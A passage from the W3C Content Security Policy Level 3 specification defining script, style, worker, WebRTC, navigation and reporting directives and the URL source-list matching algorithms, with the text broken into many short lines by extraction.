setInterval()
with an initial argument which is not callable.
Note: If a user agent implements non-standard sinks like
setImmediate()
orexecScript()
, they SHOULD also be gated on "unsafe-eval
". Note: Since "unsafe-eval
" acts as a global page flag,script-src-attr
andscript-src-elem
are not used when performing this check, insteadscript-src
(or it’s fallback directive) is always used. -
The following WebAssembly execution sinks are gated on the "
wasm-unsafe-eval
" or the "unsafe-eval
" source expressions:Note: the "
wasm-unsafe-eval
" source expression is the more specific source expression. In particular, "unsafe-eval
" permits both compilation (and instantiation) of WebAssembly and, for example, the use of the "eval
" operation in JavaScript. The "wasm-unsafe-eval
" source expression only permits WebAssembly and does not affect JavaScript. -
Navigation to
javascript:
URLs MUST pass through § 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? . Such navigations will only execute script if every policy allows inline script, as per #3 above.
6.1.10.1.
script-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src
and policy is "No
", return "Allowed
". -
Return the result of executing § 6.7.1.1 Script directives pre-request check on request , this directive, and policy .
6.1.10.2.
script-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src
and policy is "No
", return "Allowed
". -
Return the result of executing § 6.7.1.2 Script directives post-request check on request , response , this directive, and policy .
6.1.10.3.
script-src
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Assert: element is not null or type is "
navigation
". -
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.11.
script-src-elem
The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "script-src-elem" directive-value = serialized-source-list
The
script-src-elem
directive
applies
to
all
script
requests
and
script
blocks.
Attributes
that
execute
script
(inline
event
handlers)
are
controlled
via
script-src-attr
.
As
such,
the
following
differences
exist
when
comparing
to
script-src
:
-
script-src-elem
applies to inline checks whose|type|
is "script
" and "navigation
" (and is ignored for inline checks whose|type|
is "script attribute
"). -
script-src-elem
’s value is not used for JavaScript execution sink checks that are gated on the "unsafe-eval
" check. -
script-src-elem
is not used as a fallback for theworker-src
directive. Theworker-src
checks still fall back on thescript-src
directive.
6.1.11.1.
script-src-elem
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src-elem
and policy is "No
", return "Allowed
". -
Return the result of executing § 6.7.1.1 Script directives pre-request check on request , this directive, and policy .
6.1.11.2.
script-src-elem
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src-elem
and policy is "No
", return "Allowed
". -
Return the result of executing § 6.7.1.2 Script directives post-request check on request , response , this directive, and policy .
6.1.11.3.
script-src-elem
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Assert: element is not null or type is "
navigation
". -
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src-elem
, and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.12.
script-src-attr
The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "script-src-attr" directive-value = serialized-source-list
The
script-src-attr
directive
applies
to
event
handlers
and,
if
present,
it
will
override
the
script-src
directive
for
relevant
checks.
6.1.12.1.
script-src-attr
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Assert: element is not null or type is "
navigation
". -
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
script-src-attr
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.13.
style-src
The
style-src
directive
restricts
the
locations
from
which
style
may
be
applied
to
a
Document
.
The
syntax
for
the
directive’s
name
and
value
is
described
by
the
following
ABNF:
directive-name = "style-src" directive-value = serialized-source-list
The
style-src
directive
governs
several
things:
-
Style requests MUST pass through § 4.1.2 Should request be blocked by Content Security Policy? . This includes:
-
Responses to style requests MUST pass through § 4.1.3 Should response to request be blocked by Content Security Policy? .
-
Inline
style
blocks MUST pass through § 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? . The styles will be blocked unless every policy allows inline style, either implicitly by not specifying astyle-src
(ordefault-src
) directive, or explicitly, by specifying "unsafe-inline
", a nonce-source or a hash-source that matches the inline block. -
The following CSS algorithms are gated on the
unsafe-eval
source expression:This would include, for example, all invocations of CSSOM’s various
cssText
setters andinsertRule
methods [CSSOM] [HTML] .This needs to be better explained. [w3c/webappsec-csp Issue #212]
6.1.13.1.
style-src
Pre-request
Check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.13.2.
style-src
Post-request
Check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.13.3.
style-src
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
This directive’s initialization algorithm is as follows:
Do something interesting to the execution context in order to lock down interesting CSSOM algorithms. I don’t think CSSOM gives us any hooks here, so let’s work with them to put something reasonable together.
6.1.14.
style-src-elem
The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "style-src-elem" directive-value = serialized-source-list
The style-src-elem directive governs the behaviour of styles except for styles defined in inline attributes.
6.1.14.1.
style-src-elem
Pre-request
Check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src-elem
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.14.2.
style-src-elem
Post-request
Check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src-elem
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.14.3.
style-src-elem
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src-elem
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.15.
style-src-attr
The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "style-src-attr" directive-value = serialized-source-list
The style-src-attr directive governs the behaviour of style attributes.
6.1.15.1.
style-src-attr
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
style-src-attr
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.3.3 Does element match source list for type and source? on element , this directive’s value , type , and source , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.2. Other Directives
6.2.1.
webrtc
The webrtc directive restricts whether connections may be established via WebRTC. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "webrtc" directive-value = "'allow'" / "'block'"
Content-Security-Policy: webrtc 'block'
No local ICE candidates will be surfaced, as no STUN checks will be made against the ICE server provided to the peer connection negotiated below; No connectivity-checks will be attempted to any remote candidates provided by JS; The connectionState will never transition to "connected" and instead transition directly from its initial state of "new" to "failed" shortly. Attempts to pc.restartIce() will repeat this outcome.
< script > const iceServers= [{ urls: "stun:stun.l.google.com:19302" }]; const pc= new RTCPeerConnection({ iceServers}); pc. createDataChannel( "" ); const io= new WebSocket( 'ws://example.com:8080' ); pc. onicecandidate= ({ candidate}) => io. send({ candidate}); pc. onnegotiationneeded= async () => { await pc. setLocalDescription(); io. send({ description: pc. localDescription}); }; io. onmessage= async ({ data: { description, candidate}}) => { if ( description) { await pc. setRemoteDescription( description); if ( description. type== "offer" ) { await pc. setLocalDescription(); io. send({ description: pc. localDescription}); } } else if ( candidate) await pc. addIceCandidate( candidate); }; </ script >
6.2.1.1.
webrtc
Pre-connect
Check
This directive’s webrtc pre-connect check is as follows:
-
If this directive’s value contains a single item which is an ASCII case-insensitive match for the string "
'allow'
", return "Allowed
". -
Return "
Blocked
".
6.2.2.
worker-src
The
worker-src
directive
restricts
the
URLs
which
may
be
loaded
as
a
Worker
,
SharedWorker
,
or
ServiceWorker
.
The
syntax
for
the
directive’s
name
and
value
is
described
by
the
following
ABNF:
directive-name = "worker-src" directive-value = serialized-source-list
Content-Security-Policy: worker-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
worker-src
’s
source
list
:
< script > var blockedWorker= new Worker( "data:application/javascript,..." ); blockedWorker= new SharedWorker( "https://example.org/" ); navigator. serviceWorker. register( 'https://example.org/sw.js' ); </ script >
6.2.2.1.
worker-src
Pre-request
Check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
worker-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.2.2.2.
worker-src
Post-request
Check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
worker-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.3. Document Directives
The following directives govern the properties of a document or worker environment to which a policy applies.
6.3.1.
base-uri
The
base-uri
directive
restricts
the
URL
s
which
can
be
used
in
a
Document
’s
base
element.
The
syntax
for
the
directive’s
name
and
value
is
described
by
the
following
ABNF:
directive-name = "base-uri" directive-value = serialized-source-list
The following algorithm is called during HTML’s set the frozen base url algorithm in order to monitor and enforce this directive:
6.3.1.1. Is base allowed for document ?
Given
a
URL
base
,
and
a
Document
document
,
this
algorithm
returns
"
Allowed
"
if
base
may
be
used
as
the
value
of
a
base
element’s
href
attribute,
and
"
Blocked
"
otherwise:
-
For each policy of document ’s global object ’s csp list :
-
Let source list be null.
-
If a directive whose name is "
base-uri
" is present in policy ’s directive set , set source list to that directive ’s value . -
If source list is null, skip to the next policy .
-
If the result of executing § 6.7.2.7 Does url match source list in origin with redirect count? on base , source list , policy ’s self-origin , and
0
is "Does Not Match
":-
Let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on document ’s global object , policy , and "
base-uri
". -
Set violation ’s resource to "
inline
". -
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", return "Blocked
".
-
Note: We compare against the fallback base URL in order to deal correctly with things like an iframe
srcdoc
Document
which has been sandboxed into an opaque origin. -
-
Return "
Allowed
".
6.3.2.
sandbox
The
sandbox
directive
specifies
an
HTML
sandbox
policy
which
the
user
agent
will
apply
to
a
resource,
just
as
though
it
had
been
included
in
an
iframe
with
a
sandbox
property.
The
directive’s
syntax
is
described
by
the
following
ABNF
grammar,
with
the
additional
requirement
that
each
token
value
MUST
be
one
of
the
keywords
defined
by
HTML
specification
as
allowed
values
for
the
iframe
sandbox
attribute
[HTML]
.
directive-name = "sandbox" directive-value = "" / token *( required-ascii-whitespace token )
This
directive
has
no
reporting
requirements;
it
will
be
ignored
entirely
when
delivered
in
a
Content-Security-Policy-Report-Only
header,
or
within
a
meta
element.
6.3.2.1.
sandbox
Initialization
This
directive’s
initialization
algorithm
is
responsible
for
checking
whether
a
worker
is
allowed
to
run
according
to
the
sandbox
values
present
in
its
policies
as
follows:
Note:
The
sandbox
directive
is
also
responsible
for
adjusting
a
Document
’s
active
sandboxing
flag
set
via
the
CSP-derived
sandboxing
flags
.
Given
a
Document
or
global
object
context
and
a
policy
policy
:
-
If policy ’s disposition is not "
enforce
", or context is not aWorkerGlobalScope
, then abort this algorithm. -
Let sandboxing flag set be a new sandboxing flag set .
-
Parse a sandboxing directive using this directive’s value as the input, and sandboxing flag set as the output.
-
If sandboxing flag set contains either the sandboxed scripts browsing context flag or the sandboxed origin browsing context flag flags, return "
Blocked
".Note: This will need to change if we allow Workers to be sandboxed into unique origins, which seems like a pretty reasonable thing to do.
-
Return "
Allowed
".
6.4. Navigation Directives
6.4.1.
form-action
The
form-action
directive
restricts
the
URL
s
which
can
be
used
as
the
target
of
a
form
submissions
from
a
given
context.
The
directive’s
syntax
is
described
by
the
following
ABNF
grammar:
directive-name = "form-action" directive-value = serialized-source-list
6.4.1.1.
form-action
Pre-Navigation
Check
Given
a
request
request
,
a
string
navigation
type
("
form-submission
"
or
"
other
"),
and
a
policy
policy
this
algorithm
returns
"
Blocked
"
if
a
form
submission
violates
the
form-action
directive’s
constraints,
and
"
Allowed
"
otherwise.
This
constitutes
the
form-action
directive’s
pre-navigation
check
:
-
Assert: policy is unused in this algorithm.
-
If navigation type is "
form-submission
":-
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and a policy , is "
Does Not Match
", return "Blocked
".
-
-
Return "
Allowed
".
6.4.2.
frame-ancestors
The
frame-ancestors
directive
restricts
the
URL
s
which
can
embed
the
resource
using
frame
,
iframe
,
object
,
or
embed
.
Resources
can
use
this
directive
to
avoid
many
UI
Redressing
[UISECURITY]
attacks,
by
avoiding
the
risk
of
being
embedded
into
potentially
hostile
contexts.
The directive’s syntax is described by the following ABNF grammar:
directive-name = "frame-ancestors" directive-value = ancestor-source-list ancestor-source-list = ( ancestor-source *( required-ascii-whitespace ancestor-source) ) / "'none'" ancestor-source = scheme-source / host-source / "'self'"
The
frame-ancestors
directive
MUST
be
ignored
when
contained
in
a
policy
declared
via
a
meta
element.
Note:
The
frame-ancestors
directive’s
syntax
is
similar
to
a
source
list
,
but
frame-ancestors
will
not
fall
back
to
the
default-src
directive’s
value
if
one
is
specified.
That
is,
a
policy
that
declares
default-src
'none'
will
still
allow
the
resource
to
be
embedded
by
anyone.
6.4.2.1.
frame-ancestors
Navigation
Response
Check
Given
a
request
request
,
a
string
navigation
type
("
form-submission
"
or
"
other
"),
a
response
navigation
response
,
a
navigable
target
,
a
string
check
type
("
source
"
or
"
response
"),
and
a
policy
policy
this
algorithm
returns
"
Blocked
"
if
one
or
more
of
the
ancestors
of
target
violate
the
frame-ancestors
directive
delivered
with
the
response,
and
"
Allowed
"
otherwise.
This
constitutes
the
frame-ancestors
directive’s
navigation
response
check
:
-
If navigation response ’s URL is local , return "
Allowed
". -
Assert: request , navigation response , and navigation type , are unused from this point forward in this algorithm, as
frame-ancestors
is concerned only with navigation response ’s frame-ancestors directive . -
If check type is "
source
", return "Allowed
".Note: The 'frame-ancestors' directive is relevant only to the target navigable and it has no impact on the request ’s context.
-
If target is not a child navigable , return "
Allowed
". -
Let current be target .
-
While current is a child navigable :
-
Let document be current ’s container document .
-
Let origin be the result of executing the URL parser on the ASCII serialization of document ’s origin .
-
If § 6.7.2.7 Does url match source list in origin with redirect count? returns
Does Not Match
when executed upon origin , this directive’s value , policy ’s self-origin , and0
, return "Blocked
". -
Set current to document ’s node navigable .
-
-
Return "
Allowed
".
6.4.2.2.
Relation
to
`
`
X-Frame-Options
`
`
X-Frame-Options
`
This
directive
is
similar
to
the
`
`
`
HTTP
response
header.
The
X-Frame-Options
`
'none'
source
expression
is
roughly
equivalent
to
that
header’s
`
DENY
`,
and
'self'
to
that
header’s
`
SAMEORIGIN
`.
[HTML]
In
order
to
allow
backwards-compatible
deployment,
the
frame-ancestors
directive
overrides
the
`
`
`
header.
If
a
resource
is
delivered
with
a
policy
that
includes
a
directive
named
X-Frame-Options
`
frame-ancestors
and
whose
disposition
is
"
enforce
",
then
the
`
`
`
header
will
be
ignored,
per
HTML
’s
processing
model.
X-Frame-Options
`
6.5. Reporting Directives
Various algorithms in this document hook into the reporting process by constructing a violation object via § 2.4.2 Create a violation object for request, and policy. or § 2.4.1 Create a violation object for global, policy, and directive , and passing that object to § 5.5 Report a violation to deliver the report.
6.5.1.
report-uri
report-uri
directive
is
deprecated.
Please
use
the
report-to
directive
instead.
If
the
latter
directive
is
present,
this
directive
will
be
ignored.
To
ensure
backwards
compatibility,
we
suggest
specifying
both,
like
this:
Content-Security-Policy: ...; report-uri https://endpoint.com; report-to groupname
The
report-uri
directive
defines
a
set
of
endpoints
to
which
csp
violation
reports
will
be
sent
when
particular
behaviors
are
prevented.
directive-name = "report-uri" directive-value = uri-reference *( required-ascii-whitespace uri-reference ) ; The uri-reference grammar is defined in Section 4.1 of RFC 3986.
The directive has no effect in and of itself, but only gains meaning in combination with other directives.
6.5.2.
report-to
The
report-to
directive
defines
a
reporting
endpoint
to
which
violation
reports
ought
to
be
sent
[REPORTING]
.
The
directive’s
behavior
is
defined
in
§ 5.5
Report
a
violation
.
The
directive’s
name
and
value
are
described
by
the
following
ABNF:
directive-name = "report-to" directive-value = token
6.6. Directives Defined in Other Documents
This document defines a core set of directives, and sets up a framework for modular extension by other specifications. At the time this document was produced, the following stable documents extend CSP:
-
[MIX] defines
block-all-mixed-content
-
[UPGRADE-INSECURE-REQUESTS] defines
upgrade-insecure-requests
Extensions to CSP MUST register themselves via the process outlined in [RFC7762] . In particular, note the criteria discussed in Section 4.2 of that document.
New directives SHOULD use the pre-request check , post-request check , and initialization hooks in order to integrate themselves into Fetch and HTML.
6.7. Matching Algorithms
6.7.1. Script directive checks
6.7.1.1. Script directives pre-request check
Given a request request , a directive directive , and a policy policy :
-
If request ’s destination is script-like :
-
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.4 Does integrity metadata match source list? on request ’s integrity metadata and this directive’s value is "
Matches
", return "Allowed
". -
If directive ’s value contains a source expression that is an ASCII case-insensitive match for the "
'strict-dynamic'
" keyword-source :-
If the request ’s parser metadata is "parser-inserted" , return "
Blocked
".Otherwise, return "
Allowed
".Note: "
'strict-dynamic'
" is explained in more detail in § 8.2 Usage of "'strict-dynamic'" .
-
-
If the result of executing § 6.7.2.5 Does request match source list? on request , directive ’s value , and policy , is "
Does Not Match
", return "Blocked
".
-
-
Return "
Allowed
".
6.7.1.2. Script directives post-request check
This directive’s post-request check is as follows:
Given a request request , a response response , a directive directive , and a policy policy :
Note: This check needs both request and response as input parameters since if request ’s cryptographic nonce metadata or integrity metadata matches, then the script is allowed to load and the check of whether response ’s url matches the source list is skipped.
-
If request ’s destination is script-like :
-
Call potentially report hash with response , request , directive and policy .
-
If the result of executing § 6.7.2.3 Does nonce match source list? on request ’s cryptographic nonce metadata and this directive’s value is "
Matches
", return "Allowed
". -
If the result of executing § 6.7.2.4 Does integrity metadata match source list? on request ’s integrity metadata and this directive’s value is "
Matches
", return "Allowed
". -
If directive ’s value contains a source expression that is an ASCII case-insensitive match for the "
'strict-dynamic'
" keyword-source :-
If the request ’s parser metadata is "parser-inserted" , return "
Blocked
".Otherwise, return "
Allowed
".Note: "
'strict-dynamic'
" is explained in more detail in § 8.2 Usage of "'strict-dynamic'" .
-
-
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , directive ’s value , and policy , is "
Does Not Match
", return "Blocked
".
-
-
Return "
Allowed
".
6.7.2. URL Matching
6.7.2.1. Does request violate policy ?
Given
a
request
request
and
a
policy
policy
,
this
algorithm
returns
the
violated
directive
if
the
request
violates
the
policy,
and
"
Does
Not
Violate
"
otherwise.
-
If request ’s initiator is "
prefetch
", then return the result of executing § 6.7.2.2 Does resource hint request violate policy? on request and policy . -
Let violates be "
Does Not Violate
". -
For each directive of policy :
-
Let result be the result of executing directive ’s pre-request check on request and policy .
-
If result is "
Blocked
", then let violates be directive .
-
-
Return violates .
6.7.2.2. Does resource hint request violate policy ?
Given
a
request
request
and
a
policy
policy
,
this
algorithm
returns
the
default
directive
if
the
resource-hint
request
violates
all
the
policies,
and
"
Does
Not
Violate
"
otherwise.
-
Let defaultDirective be policy ’s first directive whose name is "
default-src
". -
If defaultDirective does not exist, return "
Does Not Violate
". -
For each directive of policy :
-
If directive ’s name is not one of the following:
-
child-src
-
connect-src
-
font-src
-
frame-src
-
img-src
-
manifest-src
-
media-src
-
object-src
-
script-src
-
script-src-elem
-
style-src
-
style-src-elem
-
worker-src
then continue.
-
-
Assert: directive ’s value is a source list .
-
Let result be the result of executing § 6.7.2.5 Does request match source list? on request , directive ’s value , and policy .
-
If result is "
Allowed
", then return "Does Not Violate
".
-
-
Return defaultDirective .
6.7.2.3. Does nonce match source list ?
Given
a
request
’s
cryptographic
nonce
metadata
nonce
and
a
source
list
source
list
,
this
algorithm
returns
"
Matches
"
if
the
nonce
matches
one
or
more
source
expressions
in
the
list,
and
"
Does
Not
Match
"
otherwise:
-
Assert: source list is not null.
-
If nonce is the empty string, return "
Does Not Match
". -
For each expression of source list :
-
If expression matches the
nonce-source
grammar, and nonce is identical to expression ’sbase64-value
part, return "Matches
".
-
-
Return "
Does Not Match
".
6.7.2.4. Does integrity metadata match source list ?
Given
a
request
’s
integrity
metadata
integrity
metadata
and
a
source
list
source
list
,
this
algorithm
returns
"
Matches
"
if
the
integrity
metadata
matches
one
or
more
source
expressions
in
the
list,
and
"
Does
Not
Match
"
otherwise:
-
Assert: source list is not null.
-
Let integrity expressions be the set of source expressions in source list that match the hash-source grammar.
-
If integrity expressions is empty, return "
Does Not Match
". -
Let integrity sources be the result of
executing the algorithm defined in SRI § 3.3.2 Parseparsing metadataongiven integrity metadata . [SRI] -
If integrity sources is "
no metadata
" or an empty set, return "Does Not Match
". -
For each source of integrity sources :
-
If integrity expressions does not contain a source expression whose hash-algorithm is an ASCII case-insensitive match for source ’s hash-algorithm , and whose base64-value is identical to source ’s
base64-value
, return "Does Not Match
".
-
-
Return "
Matches
".
Note: Here, we verify only whether the integrity metadata is a non-empty subset of the hash-source sources in source list . We rely on the browser’s enforcement of Subresource Integrity [SRI] to block non-matching resources upon response.
6.7.2.5. Does request match source list ?
Given a request request , a source list source list , and a policy policy , this algorithm returns the result of executing § 6.7.2.7 Does url match source list in origin with redirect count? on request ’s current url , source list , policy ’s self-origin , and request ’s redirect count .
Note: This is generally used in directives ' pre-request check algorithms to verify that a given request is reasonable.
6.7.2.6. Does response to request match source list ?
Given a response response , a request request , a source list source list , and a policy policy , this algorithm returns the result of executing § 6.7.2.7 Does url match source list in origin with redirect count? on response ’s url , source list , policy ’s self-origin , and request ’s redirect count .
Note: This is generally used in directives ' post-request check algorithms to verify that a given response is reasonable.
6.7.2.7. Does url match source list in origin with redirect count ?
Given
a
URL
url
,
a
source
list
source
list
,
an
origin
origin
,
and
a
number
redirect
count
,
this
algorithm
returns
"
Matches
"
if
the
URL
matches
one
or
more
source
expressions
in
source
list
,
or
"
Does
Not
Match
"
otherwise:
-
Assert: source list is not null.
-
If source list is empty , return "
Does Not Match
". -
If source list ’s size is 1, and source list [0] is an ASCII case-insensitive match for the string "
'none'
", return "Does Not Match
".Note: An empty source list (that is, a directive without a value:
script-src
, as opposed toscript-src host1
) is equivalent to a source list containing'none'
, and will not match any URL.Note: The
'none'
keyword has no effect when other source expressions are present. That is, the list «'none'
» does not match any URL. A list consisting of «'none'
,https://example.com
», on the other hand, would matchhttps://example.com/
. -
For each expression of source list :
-
If § 6.7.2.8 Does url match expression in origin with redirect count? returns "
Matches
" when executed upon url , expression , origin , and redirect count , return "Matches
".
-
-
Return "
Does Not Match
".
6.7.2.8. Does url match expression in origin with redirect count ?
Given
a
URL
url
,
a
source
expression
expression
,
an
origin
origin
,
and
a
number
redirect
count
,
this
algorithm
returns
"
Matches
"
if
url
matches
expression
,
and
"
Does
Not
Match
"
otherwise.
Note:
origin
is
the
origin
of
the
resource
relative
to
which
the
expression
should
be
resolved.
"
'self'
",
for
instance,
will
have
distinct
meaning
depending
on
that
bit
of
context.
-
If expression is the string "*", return "
Matches
" if one or more of the following conditions is met:-
url ’s scheme is an HTTP(S) scheme .
Note: This logic means that in order to allow a resource from a non- HTTP(S) scheme , it has to be either explicitly specified (e.g.
default-src * data: custom-scheme-1: custom-scheme-2:
), or the protected resource must be loaded from the same scheme. -
-
If expression matches the
scheme-source
orhost-source
grammar:-
If expression has a
scheme-part
, and it does notscheme-part
match url ’s scheme , return "Does Not Match
". -
If expression matches the
scheme-source
grammar, return "Matches
".
-
-
If expression matches the
host-source
grammar:-
If url ’s
host
is null, return "Does Not Match
". -
If expression does not have a
scheme-part
, and origin ’s scheme does notscheme-part
match url ’s scheme , return "Does Not Match
".Note: As with
scheme-part
above, we allow schemelesshost-source
expressions to be upgraded from insecure schemes to secure schemes. -
If expression ’s
host-part
does nothost-part
match url ’shost
, return "Does Not Match
". -
Let port-part be expression ’s
port-part
if present, and null otherwise. -
If port-part does not
port-part
match url , return "Does Not Match
". -
If expression contains a non-empty
path-part
, and redirect count is 0, then:-
Let path be the result of running the URL path serializer on url .
-
If expression ’s
path-part
does notpath-part
match path , return "Does Not Match
".
-
-
Return "
Matches
".
-
-
If expression is an ASCII case-insensitive match for "
'self'
", return "Matches
" if one or more of the following conditions is met:-
origin is the same as url ’s origin
-
origin ’s
host
is the same as url ’shost
, origin ’sport
and url ’sport
are either the same or the default ports for their respective scheme s, and one or more of the following conditions is met:
Note: Like the
scheme-part
logic above, the "'self'
" matching algorithm allows upgrades to secure schemes when it is safe to do so. We limit these upgrades to endpoints running on the default port for a particular scheme or a port that matches the origin of the protected resource, as this seems sufficient to deal with upgrades that can be reasonably expected to succeed. -
-
Return "
Does Not Match
".
6.7.2.9.
scheme-part
matching
An
ASCII
string
scheme-part
matches
another
ASCII
string
if
a
CSP
source
expression
that
contained
the
first
as
a
scheme-part
could
potentially
match
a
URL
containing
the
latter
as
a
scheme
.
For
example,
we
say
that
"http"
scheme-part
matches
"https".
Note:
The
matching
relation
is
asymmetric.
For
example,
the
source
expressions
https:
and
https://example.com/
do
not
match
the
URL
http://example.com/
.
We
always
allow
a
secure
upgrade
from
an
explicitly
insecure
expression.
script-src
http:
is
treated
as
equivalent
to
script-src
http:
https:
,
script-src
http://example.com
to
script-src
http://example.com
https://example.com
,
and
connect-src
ws:
to
connect-src
ws:
wss:
.
More
formally,
two
ASCII
strings
A
and
B
are
said
to
scheme-part
match
if
the
following
algorithm
returns
"
Matches
":
-
If one of the following is true, return "
Matches
":-
A is an ASCII case-insensitive match for B .
-
A is an ASCII case-insensitive match for "
http
", and B is an ASCII case-insensitive match for "https
". -
A is an ASCII case-insensitive match for "
ws
", and B is an ASCII case-insensitive match for "wss
", "http
", or "https
". -
A is an ASCII case-insensitive match for "
wss
", and B is an ASCII case-insensitive match for "https
".
-
-
Return "
Does Not Match
".
6.7.2.10.
host-part
matching
An
ASCII
string
host-part
matches
a
host
if
a
CSP
source
expression
that
contained
the
first
as
a
host-part
could
potentially
match
the
latter.
For
example,
we
say
that
"www.example.com"
host-part
matches
